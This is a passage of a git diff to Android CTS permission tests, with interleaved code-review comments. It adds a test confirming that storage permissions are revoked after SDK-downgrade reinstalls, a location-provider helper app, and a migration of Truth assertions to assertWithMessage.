@@ -0,0 +1,25 @@ +// +// Copyright (C) 2016 The Android Open Source Project +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + +android_test_helper_app { + name: "CtsStorageEscalationApp29Full", + certificate: ":cts-testkey2", + test_suites: [ + "cts", + "general-tests", + "mts", + ], +} diff --git a/tests/tests/permission/StorageEscalationApp29Full/AndroidManifest.xml b/tests/tests/permission/StorageEscalationApp29Full/AndroidManifest.xml new file mode 100644 index 00000000000..73a7110deca --- /dev/null +++ b/tests/tests/permission/StorageEscalationApp29Full/AndroidManifest.xml 
@@ -0,0 +1,30 @@ +<?xml version="1.0" encoding="utf-8"?> + +<!-- + ~ Copyright (C) 2016 The Android Open Source Project + ~ + ~ Licensed under the Apache License, Version 2.0 (the "License"); + ~ you may not use this file except in compliance with the License. + ~ You may obtain a copy of the License at + ~ + ~ http://www.apache.org/licenses/LICENSE-2.0 + ~ + ~ Unless required by applicable law or agreed to in writing, software + ~ distributed under the License is distributed on an "AS IS" BASIS, + ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + ~ See the License for the specific language governing permissions and + ~ limitations under the License. + --> + +<manifest + xmlns:android="http://schemas.android.com/apk/res/android" + package="android.permission3.cts.storageescalation"> + + <uses-sdk android:minSdkVersion="29" android:targetSdkVersion="29" /> + + <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" /> + <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> + <uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION" /> + + <application android:hasCode="false" android:requestLegacyExternalStorage="true"/> +</manifest> diff --git a/tests/tests/permission/StorageEscalationApp29Scoped/Android.bp b/tests/tests/permission/StorageEscalationApp29Scoped/Android.bp new file mode 100644 index 00000000000..424a67fc531 --- /dev/null +++ b/tests/tests/permission/StorageEscalationApp29Scoped/Android.bp 
@@ -0,0 +1,25 @@ +// +// Copyright (C) 2016 The Android Open Source Project +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + +android_test_helper_app { + name: "CtsStorageEscalationApp29Scoped", + certificate: ":cts-testkey2", + test_suites: [ + "cts", + "general-tests", + "mts", + ], +} diff --git a/tests/tests/permission/StorageEscalationApp29Scoped/AndroidManifest.xml b/tests/tests/permission/StorageEscalationApp29Scoped/AndroidManifest.xml new file mode 100644 index 00000000000..c3812fe3d47 --- /dev/null +++ b/tests/tests/permission/StorageEscalationApp29Scoped/AndroidManifest.xml 
@@ -0,0 +1,30 @@ +<?xml version="1.0" encoding="utf-8"?> + +<!-- + ~ Copyright (C) 2016 The Android Open Source Project + ~ + ~ Licensed under the Apache License, Version 2.0 (the "License"); + ~ you may not use this file except in compliance with the License. + ~ You may obtain a copy of the License at + ~ + ~ http://www.apache.org/licenses/LICENSE-2.0 + ~ + ~ Unless required by applicable law or agreed to in writing, software + ~ distributed under the License is distributed on an "AS IS" BASIS, + ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + ~ See the License for the specific language governing permissions and + ~ limitations under the License. + --> + +<manifest + xmlns:android="http://schemas.android.com/apk/res/android" + package="android.permission3.cts.storageescalation"> + + <uses-sdk android:minSdkVersion="29" android:targetSdkVersion="29" /> + + <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" /> + <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> + <uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION" /> + + <application android:hasCode="false" android:requestLegacyExternalStorage="false"/> +</manifest> diff --git a/tests/tests/permission/src/android/permission/cts/BackgroundPermissionsTest.java b/tests/tests/permission/src/android/permission/cts/BackgroundPermissionsTest.java index 6077b21f7c2..a535bb050d0 100644 --- a/tests/tests/permission/src/android/permission/cts/BackgroundPermissionsTest.java +++ b/tests/tests/permission/src/android/permission/cts/BackgroundPermissionsTest.java @@ -30,7 +30,7 @@ import static android.permission.cts.PermissionUtils.uninstallApp; import static com.android.compatibility.common.util.SystemUtil.eventually; -import static com.google.common.truth.Truth.assertThat; +import static com.google.common.truth.Truth.assertWithMessage; import static org.junit.Assert.assertNotEquals; import static org.junit.Assert.assertNotNull; 
@@ -126,8 +126,8 @@ public class BackgroundPermissionsTest { install(APK_LOCATION_29v4); - eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named( - "foreground app-op").isEqualTo(MODE_FOREGROUND)); + eventually(() -> assertWithMessage("foreground app-op").that( + getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_FOREGROUND)); } /** @@ -141,8 +141,8 @@ public class BackgroundPermissionsTest { install(APK_LOCATION_BACKGROUND_29); // Wait until the system sets the app-op automatically - eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named( - "loc app-op").isEqualTo(MODE_IGNORED)); + eventually(() -> assertWithMessage("loc app-op").that( + getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_IGNORED)); } /** @@ -157,8 +157,8 @@ public class BackgroundPermissionsTest { sUiAutomation.grantRuntimePermission(APP_PKG, ACCESS_COARSE_LOCATION); // Wait until the system sets the app-op automatically - eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named( - "loc app-op").isEqualTo(MODE_FOREGROUND)); + eventually(() -> assertWithMessage("loc app-op").that( + getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_FOREGROUND)); } /** @@ -174,8 +174,8 @@ public class BackgroundPermissionsTest { sUiAutomation.grantRuntimePermission(APP_PKG, ACCESS_BACKGROUND_LOCATION); // Wait until the system sets the app-op automatically - eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named( - "loc app-op").isEqualTo(MODE_ALLOWED)); + eventually(() -> assertWithMessage("loc app-op").that( + getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_ALLOWED)); } /** 
@@ -191,8 +191,8 @@ public class BackgroundPermissionsTest { // Wait until the system sets the app-op automatically // Fine location uses background location to limit access - eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named( - "loc app-op").isEqualTo(MODE_FOREGROUND)); + eventually(() -> assertWithMessage("loc app-op").that( + getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_FOREGROUND)); } /** @@ -208,8 +208,8 @@ public class BackgroundPermissionsTest { sUiAutomation.grantRuntimePermission(APP_PKG, ACCESS_BACKGROUND_LOCATION); // Wait until the system sets the app-op automatically - eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named( - "loc app-op").isEqualTo(MODE_ALLOWED)); + eventually(() -> assertWithMessage("loc app-op").that( + getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_ALLOWED)); } /** @@ -225,8 +225,8 @@ public class BackgroundPermissionsTest { sUiAutomation.grantRuntimePermission(APP_PKG, ACCESS_COARSE_LOCATION); // Wait until the system sets the app-op automatically - eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named( - "loc app-op").isEqualTo(MODE_FOREGROUND)); + eventually(() -> assertWithMessage("loc app-op").that( + getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_FOREGROUND)); } /** @@ -244,7 +244,7 @@ public class BackgroundPermissionsTest { sUiAutomation.grantRuntimePermission(APP_PKG, ACCESS_BACKGROUND_LOCATION); // Wait until the system sets the app-op automatically - eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named( - "loc app-op").isEqualTo(MODE_ALLOWED)); + eventually(() -> assertWithMessage("loc app-op").that( + getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_ALLOWED)); } } diff --git a/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java b/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java index b53bf6a0cc4..5db94c1cffc 100644 
--- a/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java +++ b/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java @@ -18,10 +18,8 @@ package android.permission.cts; import static android.Manifest.permission.ACCESS_BACKGROUND_LOCATION; import static android.Manifest.permission.ACCESS_COARSE_LOCATION; -import static android.Manifest.permission.ACCESS_MEDIA_LOCATION; import static android.Manifest.permission.READ_CALL_LOG; import static android.Manifest.permission.READ_CONTACTS; -import static android.Manifest.permission.READ_EXTERNAL_STORAGE; import static android.app.AppOpsManager.MODE_FOREGROUND; import static android.content.pm.PackageManager.FLAG_PERMISSION_REVIEW_REQUIRED; import static android.content.pm.PackageManager.FLAG_PERMISSION_USER_SET; @@ -37,6 +35,7 @@ import static android.permission.cts.PermissionUtils.uninstallApp; import static com.android.compatibility.common.util.SystemUtil.eventually; import static com.google.common.truth.Truth.assertThat; +import static com.google.common.truth.Truth.assertWithMessage; import static org.junit.Assert.assertEquals; @@ -118,7 +117,8 @@ public class SplitPermissionTest { * @param permName The permission that needs to be granted */ private void assertPermissionGranted(@NonNull String permName) throws Exception { - eventually(() -> assertThat(isGranted(APP_PKG, permName)).named(permName + " is granted").isTrue()); + eventually(() -> assertWithMessage(permName + " is granted").that( + isGranted(APP_PKG, permName)).isTrue()); } /** @@ -127,7 +127,7 @@ public class SplitPermissionTest { * @param permName The permission that should not be granted */ private void assertPermissionRevoked(@NonNull String permName) throws Exception { - assertThat(isGranted(APP_PKG, permName)).named(permName + " is granted").isFalse(); + assertWithMessage(permName + " is granted").that(isGranted(APP_PKG, permName)).isFalse(); } /** 
@@ -268,22 +268,6 @@ public class SplitPermissionTest { * If a permission was granted before the split happens, the new permission should inherit the * granted state. * - * This is a duplicate of {@link #inheritGrantedPermissionState} but for the storage permission - */ - @Test - public void inheritGrantedPermissionStateStorage() throws Exception { - install(APK_STORAGE_29); - grantPermission(APP_PKG, READ_EXTERNAL_STORAGE); - - install(APK_STORAGE_28); - - assertPermissionGranted(ACCESS_MEDIA_LOCATION); - } - - /** - * If a permission was granted before the split happens, the new permission should inherit the - * granted state. - * * <p>App using a shared uid */ @Test @@ -477,8 +461,8 @@ public class SplitPermissionTest { install(APK_LOCATION_BACKGROUND_29); - eventually(() -> assertThat(getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).named("foreground app-op") - .isEqualTo(MODE_FOREGROUND)); + eventually(() -> assertWithMessage("foreground app-op").that( + getAppOp(APP_PKG, ACCESS_COARSE_LOCATION)).isEqualTo(MODE_FOREGROUND)); } /** diff --git a/tests/tests/permission/src/android/permission/cts/StorageEscalationTest.kt b/tests/tests/permission/src/android/permission/cts/StorageEscalationTest.kt new file mode 100644 index 00000000000..3e302a9b217 --- /dev/null +++ b/tests/tests/permission/src/android/permission/cts/StorageEscalationTest.kt 
@@ -0,0 +1,91 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.permission.cts + +import android.Manifest.permission.ACCESS_MEDIA_LOCATION +import android.Manifest.permission.READ_EXTERNAL_STORAGE +import android.Manifest.permission.WRITE_EXTERNAL_STORAGE +import android.app.Instrumentation +import android.app.UiAutomation +import android.content.Context +import android.content.pm.PackageManager +import androidx.test.platform.app.InstrumentationRegistry +import com.android.compatibility.common.util.SystemUtil +import org.junit.After +import org.junit.Assert +import org.junit.Before +import org.junit.Test + +class StorageEscalationTest { + companion object { + private const val APK_DIRECTORY = "/data/local/tmp/cts/permissions" + const val APP_APK_PATH_28 = "$APK_DIRECTORY/CtsStorageEscalationApp28.apk" + const val APP_APK_PATH_29_SCOPED = "$APK_DIRECTORY/CtsStorageEscalationApp29Scoped.apk" + const val APP_APK_PATH_29_FULL = "$APK_DIRECTORY/CtsStorageEscalationApp29Full.apk" + const val APP_PACKAGE_NAME = "android.permission3.cts.storageescalation" + const val DELAY_TIME_MS: Long = 200 + val permissions = listOf<String>(READ_EXTERNAL_STORAGE, WRITE_EXTERNAL_STORAGE, + ACCESS_MEDIA_LOCATION) + } + + private val instrumentation: Instrumentation = InstrumentationRegistry.getInstrumentation() + private val context: Context = instrumentation.context + private val uiAutomation: 
UiAutomation = instrumentation.uiAutomation + + @Before + @After + fun uninstallApp() { + SystemUtil.runShellCommand("pm uninstall $APP_PACKAGE_NAME") + } + + private fun installPackage(apk: String) { + SystemUtil.runShellCommand("pm install -r $apk") + } + + private fun grantStoragePermissions() { + for (permName in permissions) { + uiAutomation.grantRuntimePermission(APP_PACKAGE_NAME, permName) + } + } + + private fun assertStoragePermissionState(granted: Boolean) { + for (permName in permissions) { + Assert.assertEquals(granted, context.packageManager.checkPermission(permName, + APP_PACKAGE_NAME) == PackageManager.PERMISSION_GRANTED) + } + } + + @Test + fun testCannotEscalateWithSdkDowngrade() { + runStorageEscalationTest(APP_APK_PATH_29_SCOPED, APP_APK_PATH_28) + } + + @Test + fun testCannotEscalateWithNewManifestLegacyRequest() { + runStorageEscalationTest(APP_APK_PATH_29_SCOPED, APP_APK_PATH_29_FULL) + } + + private fun runStorageEscalationTest(startPackageApk: String, finishPackageApk: String) { + installPackage(startPackageApk) + grantStoragePermissions() + assertStoragePermissionState(granted = true) + installPackage(finishPackageApk) + // permission revoke is async, so wait a short period + Thread.sleep(DELAY_TIME_MS) + assertStoragePermissionState(granted = false) + } +}
\ No newline at end of file diff --git a/tests/tests/permission2/src/android/permission2/cts/PermissionPolicyTest.java b/tests/tests/permission2/src/android/permission2/cts/PermissionPolicyTest.java index 1140cfba574..bb48193ee4b 100644 --- a/tests/tests/permission2/src/android/permission2/cts/PermissionPolicyTest.java +++ b/tests/tests/permission2/src/android/permission2/cts/PermissionPolicyTest.java @@ -20,7 +20,7 @@ import static android.content.pm.PermissionInfo.FLAG_INSTALLED; import static android.content.pm.PermissionInfo.PROTECTION_MASK_BASE; import static android.os.Build.VERSION.SECURITY_PATCH; -import static com.google.common.truth.Truth.assertThat; +import static com.google.common.truth.Truth.assertWithMessage; import android.content.Context; import android.content.pm.PackageInfo; @@ -235,7 +235,7 @@ public class PermissionPolicyTest { } // Fail on any offending item - assertThat(offendingList).named("list of offending permissions").isEmpty(); + assertWithMessage("list of offending permissions").that(offendingList).isEmpty(); } private List<ExpectedPermissionInfo> loadExpectedPermissions(int resourceId) throws Exception { diff --git a/tests/tests/permission2/src/android/permission2/cts/RestrictedPermissionsTest.java b/tests/tests/permission2/src/android/permission2/cts/RestrictedPermissionsTest.java index b44cfcbdf77..11e61213317 100644 --- a/tests/tests/permission2/src/android/permission2/cts/RestrictedPermissionsTest.java +++ b/tests/tests/permission2/src/android/permission2/cts/RestrictedPermissionsTest.java @@ -26,6 +26,7 @@ import static com.android.compatibility.common.util.SystemUtil.eventually; import static com.android.compatibility.common.util.SystemUtil.runShellCommand; import static com.google.common.truth.Truth.assertThat; +import static com.google.common.truth.Truth.assertWithMessage; import static org.junit.Assert.fail; 
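Review bot: In StorageEscalationTest.kt, `runStorageEscalationTest` waits for the asynchronous revoke with a fixed `Thread.sleep(DELAY_TIME_MS)` of 200 ms, so on a slow device the final check can run before the revoke lands and the test fails for timing reasons rather than because of a real escalation. Polling would be more robust, for example `SystemUtil.eventually { assertStoragePermissionState(granted = false) }`, the helper the other permission tests in this commit already use. `assertStoragePermissionState` also calls `Assert.assertEquals` without a message, so a failure does not say which of the three permissions was in the wrong state; passing `permName` as the message argument fixes that. The output of the `pm install -r` shell command is not checked either, so a rejected second install surfaces only as a failed permission assertion.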
@@ -490,7 +491,7 @@ public class RestrictedPermissionsTest { private void assertRestrictedPermissionWhitelisted( @NonNull Set<String> expectedWhitelistedPermissions) throws Exception { final PackageManager packageManager = getContext().getPackageManager(); - eventually(() -> runWithShellPermissionIdentity(() -> { + eventually(() -> runWithShellPermissionIdentity(() -> { final AppOpsManager appOpsManager = getContext().getSystemService(AppOpsManager.class); final PackageInfo packageInfo = packageManager.getPackageInfo(PKG, PackageManager.GET_PERMISSIONS); @@ -502,7 +503,7 @@ public class RestrictedPermissionsTest { | PackageManager.FLAG_PERMISSION_WHITELIST_UPGRADE); assertThat(whitelistedPermissions).isNotNull(); - assertThat(whitelistedPermissions).named("Whitelisted permissions") + assertWithMessage("Whitelisted permissions").that(whitelistedPermissions) .containsExactlyElementsIn(expectedWhitelistedPermissions); // Also assert that apps ops are properly set @@ -540,8 +541,8 @@ public class RestrictedPermissionsTest { } } - assertThat(appOpsManager.unsafeCheckOpRawNoThrow(op, - packageInfo.applicationInfo.uid, PKG)).named(op).isIn(possibleModes); + assertWithMessage(op).that(appOpsManager.unsafeCheckOpRawNoThrow(op, + packageInfo.applicationInfo.uid, PKG)).isIn(possibleModes); } })); } diff --git a/tests/tests/permission2/src/android/permission2/cts/RestrictedStoragePermissionSharedUidTest.java b/tests/tests/permission2/src/android/permission2/cts/RestrictedStoragePermissionSharedUidTest.java index 044abe257b9..5fb56e81d4d 100644 --- a/tests/tests/permission2/src/android/permission2/cts/RestrictedStoragePermissionSharedUidTest.java +++ b/tests/tests/permission2/src/android/permission2/cts/RestrictedStoragePermissionSharedUidTest.java 
@@ -28,7 +28,7 @@ import static com.android.compatibility.common.util.SystemUtil.eventually; import static com.android.compatibility.common.util.SystemUtil.runShellCommand; import static com.android.compatibility.common.util.SystemUtil.runWithShellPermissionIdentity; -import static com.google.common.truth.Truth.assertThat; +import static com.google.common.truth.Truth.assertWithMessage; import static java.lang.Integer.min; @@ -99,8 +99,8 @@ public class RestrictedStoragePermissionSharedUidTest { * @param expectGranted {@code true} if the permission is expected to be granted */ void assertStoragePermGranted(boolean expectGranted) { - eventually(() -> assertThat(isGranted(mPkg, READ_EXTERNAL_STORAGE)).named( - this + " read storage granted").isEqualTo(expectGranted)); + eventually(() -> assertWithMessage(this + " read storage granted").that( + isGranted(mPkg, READ_EXTERNAL_STORAGE)).isEqualTo(expectGranted)); } /** @@ -112,11 +112,13 @@ public class RestrictedStoragePermissionSharedUidTest { eventually(() -> runWithShellPermissionIdentity(() -> { int uid = sContext.getPackageManager().getPackageUid(mPkg, 0); if (expectHasNotIsolatedStorage) { - assertThat(sAppOpsManager.unsafeCheckOpRawNoThrow(OPSTR_LEGACY_STORAGE, uid, - mPkg)).named(this + " legacy storage mode").isEqualTo(MODE_ALLOWED); + assertWithMessage(this + " legacy storage mode").that( + sAppOpsManager.unsafeCheckOpRawNoThrow(OPSTR_LEGACY_STORAGE, uid, + mPkg)).isEqualTo(MODE_ALLOWED); } else { - assertThat(sAppOpsManager.unsafeCheckOpRawNoThrow(OPSTR_LEGACY_STORAGE, uid, - mPkg)).named(this + " legacy storage mode").isNotEqualTo(MODE_ALLOWED); + assertWithMessage(this + " legacy storage mode").that( + sAppOpsManager.unsafeCheckOpRawNoThrow(OPSTR_LEGACY_STORAGE, uid, + mPkg)).isNotEqualTo(MODE_ALLOWED); } })); } 
diff --git a/tests/tests/permission2/src/android/permission2/cts/RuntimePermissionProperties.kt b/tests/tests/permission2/src/android/permission2/cts/RuntimePermissionProperties.kt index 26c6cc82bcf..c54a96c9201 100644 --- a/tests/tests/permission2/src/android/permission2/cts/RuntimePermissionProperties.kt +++ b/tests/tests/permission2/src/android/permission2/cts/RuntimePermissionProperties.kt @@ -56,6 +56,7 @@ import android.permission.PermissionManager import androidx.test.platform.app.InstrumentationRegistry import androidx.test.runner.AndroidJUnit4 import com.google.common.truth.Truth.assertThat +import com.google.common.truth.Truth.assertWithMessage import org.junit.Test import org.junit.runner.RunWith @@ -75,14 +76,14 @@ class RuntimePermissionProperties { platformRuntimePerms.filter { !platformBgPermNames.contains(it.name) } for (perm in platformFgPerms) { - assertThat(permissionToOp(perm.name)).named("AppOp for ${perm.name}").isNotNull() + assertWithMessage("AppOp for ${perm.name}").that(permissionToOp(perm.name)).isNotNull() } } @Test fun groupOfRuntimePermissionsShouldBeUnknown() { for (perm in platformRuntimePerms) { - assertThat(perm.group).named("Group of ${perm.name}").isEqualTo(UNDEFINED) + assertWithMessage("Group of ${perm.name}").that(perm.group).isEqualTo(UNDEFINED) } } @@ -96,7 +97,7 @@ class RuntimePermissionProperties { } for (perm in platformAppOpPerms) { - assertThat(permissionToOp(perm.name)).named("AppOp for ${perm.name}").isNotNull() + assertWithMessage("AppOp for ${perm.name}").that(permissionToOp(perm.name)).isNotNull() } } @@ -109,7 +110,7 @@ class RuntimePermissionProperties { platformRuntimePerms.filter { platformBgPermNames.contains(it.name) } for (perm in platformBgPerms) { - assertThat(permissionToOp(perm.name)).named("AppOp for ${perm.name}").isNull() + assertWithMessage("AppOp for ${perm.name}").that(permissionToOp(perm.name)).isNull() } } 
diff --git a/tests/tests/permission3/Android.bp b/tests/tests/permission3/Android.bp index abedeefbee3..ffe42ad90cf 100644 --- a/tests/tests/permission3/Android.bp +++ b/tests/tests/permission3/Android.bp @@ -22,6 +22,7 @@ android_test { ], static_libs: [ "kotlin-stdlib", + "androidx.core_core", "androidx.test.rules", "compatibility-device-util-axt", "ctstestrunner-axt", @@ -37,6 +38,7 @@ android_test { ":CtsUsePermissionApp29", ":CtsUsePermissionAppLatest", ":CtsUsePermissionAppLatestWithBackground", + ":CtsUsePermissionAppLocationProvider", ":CtsUsePermissionAppWithOverlay", ], test_suites: [ diff --git a/tests/tests/permission3/AndroidTest.xml b/tests/tests/permission3/AndroidTest.xml index cdf7308d49c..23df08fddd5 100644 --- a/tests/tests/permission3/AndroidTest.xml +++ b/tests/tests/permission3/AndroidTest.xml @@ -43,6 +43,7 @@ <option name="push" value="CtsUsePermissionApp29.apk->/data/local/tmp/cts/permission3/CtsUsePermissionApp29.apk" /> <option name="push" value="CtsUsePermissionAppLatest.apk->/data/local/tmp/cts/permission3/CtsUsePermissionAppLatest.apk" /> <option name="push" value="CtsUsePermissionAppLatestWithBackground.apk->/data/local/tmp/cts/permission3/CtsUsePermissionAppLatestWithBackground.apk" /> + <option name="push" value="CtsUsePermissionAppLocationProvider.apk->/data/local/tmp/cts/permission3/CtsUsePermissionAppLocationProvider.apk" /> <option name="push" value="CtsUsePermissionAppWithOverlay.apk->/data/local/tmp/cts/permission3/CtsUsePermissionAppWithOverlay.apk" /> </target_preparer> diff --git a/tests/tests/permission3/UsePermissionAppLocationProvider/Android.bp b/tests/tests/permission3/UsePermissionAppLocationProvider/Android.bp new file mode 100644 index 00000000000..56c9966eee0 --- /dev/null +++ b/tests/tests/permission3/UsePermissionAppLocationProvider/Android.bp 
@@ -0,0 +1,31 @@ +// +// Copyright (C) 2021 The Android Open Source Project +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + +package { + default_applicable_licenses: ["Android-Apache-2.0"], +} + +android_test_helper_app { + name: "CtsUsePermissionAppLocationProvider", + srcs: [ + ":CtsUsePermissionAppSrc", + "src/**/*.kt", + ], + static_libs: [ + "kotlin-stdlib", + ], + certificate: ":cts-testkey2", +} diff --git a/tests/tests/permission3/UsePermissionAppLocationProvider/AndroidManifest.xml b/tests/tests/permission3/UsePermissionAppLocationProvider/AndroidManifest.xml new file mode 100644 index 00000000000..16bacf56077 --- /dev/null +++ b/tests/tests/permission3/UsePermissionAppLocationProvider/AndroidManifest.xml 
@@ -0,0 +1,35 @@ +<?xml version="1.0" encoding="utf-8"?> + +<!-- + ~ Copyright (C) 2021 The Android Open Source Project + ~ + ~ Licensed under the Apache License, Version 2.0 (the "License"); + ~ you may not use this file except in compliance with the License. + ~ You may obtain a copy of the License at + ~ + ~ http://www.apache.org/licenses/LICENSE-2.0 + ~ + ~ Unless required by applicable law or agreed to in writing, software + ~ distributed under the License is distributed on an "AS IS" BASIS, + ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + ~ See the License for the specific language governing permissions and + ~ limitations under the License. + --> + +<manifest + xmlns:android="http://schemas.android.com/apk/res/android" + package="android.permission3.cts.usepermission"> + + <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" /> + + <application> + <activity android:name=".AddLocationProviderActivity" android:exported="true" /> + <activity android:name=".FinishOnCreateActivity" android:exported="true" + android:permission="android.permission.START_VIEW_PERMISSION_USAGE"> + <intent-filter> + <action android:name="android.intent.action.VIEW_PERMISSION_USAGE"/> + <category android:name="android.intent.category.DEFAULT"/> + </intent-filter> + </activity> + </application> +</manifest> diff --git a/tests/tests/permission3/UsePermissionAppLocationProvider/src/android/permission3/cts/usepermission/AddLocationProviderActivity.kt b/tests/tests/permission3/UsePermissionAppLocationProvider/src/android/permission3/cts/usepermission/AddLocationProviderActivity.kt new file mode 100644 index 00000000000..3bb461cbba7 --- /dev/null +++ b/tests/tests/permission3/UsePermissionAppLocationProvider/src/android/permission3/cts/usepermission/AddLocationProviderActivity.kt 
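Review bot: `.AddLocationProviderActivity` is declared `android:exported="true"` with no `android:permission`, while the sibling `.FinishOnCreateActivity` is guarded by `START_VIEW_PERMISSION_USAGE`, so any app on the device can start an activity whose only job is to change location-provider state. For a helper APK that is installed only for the duration of the test this is probably acceptable, since the test setup suggests the call still depends on the mock-location app-op. The manifest should say so, e.g. `<!-- Exported so the CTS test can start it; relies on OPSTR_MOCK_LOCATION being allowed only by the test. -->`.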
@@ -0,0 +1,40 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.permission3.cts.usepermission + +import android.app.Activity +import android.location.Criteria +import android.location.LocationManager +import android.os.Bundle + +/** + * An activity that adds this package as a test location provider. + */ +class AddLocationProviderActivity : Activity() { + override fun onCreate(savedInstanceState: Bundle?) { + super.onCreate(savedInstanceState) + + val locationManager = getSystemService(LocationManager::class.java) + locationManager.addTestProvider( + packageName, false, false, false, false, false, false, false, Criteria.POWER_LOW, + Criteria.ACCURACY_COARSE + ) + + setResult(RESULT_OK) + finish() + } +} diff --git a/tests/tests/permission3/src/android/permission3/cts/BaseUsePermissionTest.kt b/tests/tests/permission3/src/android/permission3/cts/BaseUsePermissionTest.kt index bea7a1629c1..6a8c51247ec 100644 --- a/tests/tests/permission3/src/android/permission3/cts/BaseUsePermissionTest.kt +++ b/tests/tests/permission3/src/android/permission3/cts/BaseUsePermissionTest.kt 
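Review bot: `onCreate` in AddLocationProviderActivity calls `addTestProvider` with no error handling, so if the mock-location app-op has not been allowed the `SecurityException` kills the activity and the caller presumably sees only a timeout on its future instead of a result code. Catching the exception and reporting `setResult(RESULT_CANCELED)` before `finish()` would make that failure readable. The seven positional `false` arguments are also hard to check against the `addTestProvider` signature; a one-line comment naming them (requiresNetwork, requiresSatellite, requiresCell, hasMonetaryCost, supportsAltitude, supportsSpeed, supportsBearing) would help.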
@@ -53,6 +53,8 @@ abstract class BaseUsePermissionTest : BasePermissionTest() { const val APP_APK_PATH_LATEST = "$APK_DIRECTORY/CtsUsePermissionAppLatest.apk" const val APP_APK_PATH_LATEST_WITH_BACKGROUND = "$APK_DIRECTORY/CtsUsePermissionAppLatestWithBackground.apk" + const val APP_APK_PATH_LOCATION_PROVIDER = + "$APK_DIRECTORY/CtsUsePermissionAppLocationProvider.apk" const val APP_APK_PATH_WITH_OVERLAY = "$APK_DIRECTORY/CtsUsePermissionAppWithOverlay.apk" const val APP_PACKAGE_NAME = "android.permission3.cts.usepermission" diff --git a/tests/tests/permission3/src/android/permission3/cts/PermissionUsageInfoTest.kt b/tests/tests/permission3/src/android/permission3/cts/PermissionUsageInfoTest.kt new file mode 100644 index 00000000000..fcfb5fdc3cd --- /dev/null +++ b/tests/tests/permission3/src/android/permission3/cts/PermissionUsageInfoTest.kt 
